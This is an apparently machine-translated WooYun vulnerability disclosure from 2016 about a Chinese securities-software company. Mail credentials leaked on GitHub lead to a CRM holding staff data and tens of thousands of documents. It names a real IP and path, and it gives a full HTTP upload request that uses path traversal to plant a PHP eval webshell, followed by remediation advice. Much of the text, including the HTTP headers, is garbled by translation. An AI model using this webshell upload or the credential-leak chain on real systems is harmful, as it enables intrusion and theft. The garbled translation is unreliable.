漏洞标题 内部信息在刷新中的某处泄漏,导致远程登录到内部主机 相关制造商 直冲 漏洞作者 击剑 提交时间 2016-04-25 14: 28 公共时间 2016-06-09 15: 20 漏洞类型 敏感信息披露 危险等级 高 自我评估等级 20 漏洞状态 制造商已确认 标签标签 敏感信息披露 漏洞详细信息 不要举行冠军派对,牛有一个洞。 该漏洞仍然非常严重 结果:超过2,000个内部员工信息泄露(包括电子邮件),30,000多个内部文档泄露,少量密码泄露,获得机器管理员权限 我希望乌云会非常注意这个漏洞,如果不能改进的话,加上它~~。在修复错误之前,不应在小范围内公开。涉及的证券仍然敏感。 首先是github信息披露 https://github.com/www1350/firstob/blob/c*1378df1718f54df7dbefc1c4ca577c334cbe/src/main/resources/conf/mail.properties
然后找 https://mail.myhexin.com/src/webmail.php 登陆 然后查看电子邮件以获取地址 https://218.108.90.228: 10089/hexin-crm
虽然它是动态密码,但它会被发送到邮箱。 获得后进入系统 超过30,000个文档(包括项目开发文档,应该有密码文件,敏感文件)
超过500个项目
员工姓名也可用。请参阅返回的json以获取邮箱名称。
从对等方接收数据时失败 6,文件上传可以更改id,应该能够覆盖以前的文件(可能会导致文件被莫名其妙地删除,我没有看到删除文件的功能) 应覆盖以下task_id更改,不得尝试 remark参数具有在输入和输出处转义的XSS漏洞。 POSThttps://218.108.90.228: 10089/hexin-crm/task/task.do?method=uploadTaskAnnex HTTP/1.1 接受: text/html,application/xhtml + xml,*/* Referer:https://218.108.90.228: 10089/hexin-crm/index.html 接受语言: zh-CN 用户代理: Mozilla/5.0(Windows NT 6.1; WOW64; Trident/7.0; rv: 11.0)就像Gecko 内容类型: multipart/form-data;边界=--------------------------- 7e05f18e107e Accept-Encoding: gzip,deflate 主机: 218.108.90.228: 10089 内容长度: 1151 DNT: 1 连接:保持活跃 缓存控制:无缓存 Cookie: JSESSIONID=AB10B437D56DDD5F2EB09C9C6174C6FC ----------------------------- 7e05f18e107e Content-Disposition: form-data;名称=annexFile'; filename='./././././././././././././data/tomcat-crm/webapps/合心文件//1.PHP” 内容类型: text/plain <php @eval($ _ POST ['c']);> ----------------------------- 7e05f18e107e Content-Disposition: form-data;名称=annexFile';文件名=“” 内容类型: application/octet-stream ----------------------------- 7e05f18e107e Content-Disposition: form-data;名称=docu_type' -1 ----------------------------- 7e05f18e107e 从对等方接收数据时失败 2,管理系统动态密码应该绑定到手机,绑定到邮箱是没用的,邮箱是泄露的,动态密码是发送到邮箱有用的。 3.如果可能,请参与VPN,不要让外部网络访问CRM系统。 4,这个管理系统还不完善,员工应该有不同的权限来访问不同的文档 5,上传附件界面,后端验证文件类型,白名单处理,只允许上传excel doc ppt rar jpg这个文件 6,存储类型XSS过滤转义特殊字符。 7,敏感文件不应放在这个公共场所,尤其是rdp文件,请要求管理员搜索文件。 8.管理员检查敏感文件。 我的QQ有问题。 也。 。 。你可以给一个level2或手机短期宝物,钱包的末尾什么的。嘿嘿^ _ ^,厚皮 版权声明:请注明来源Fencing @乌云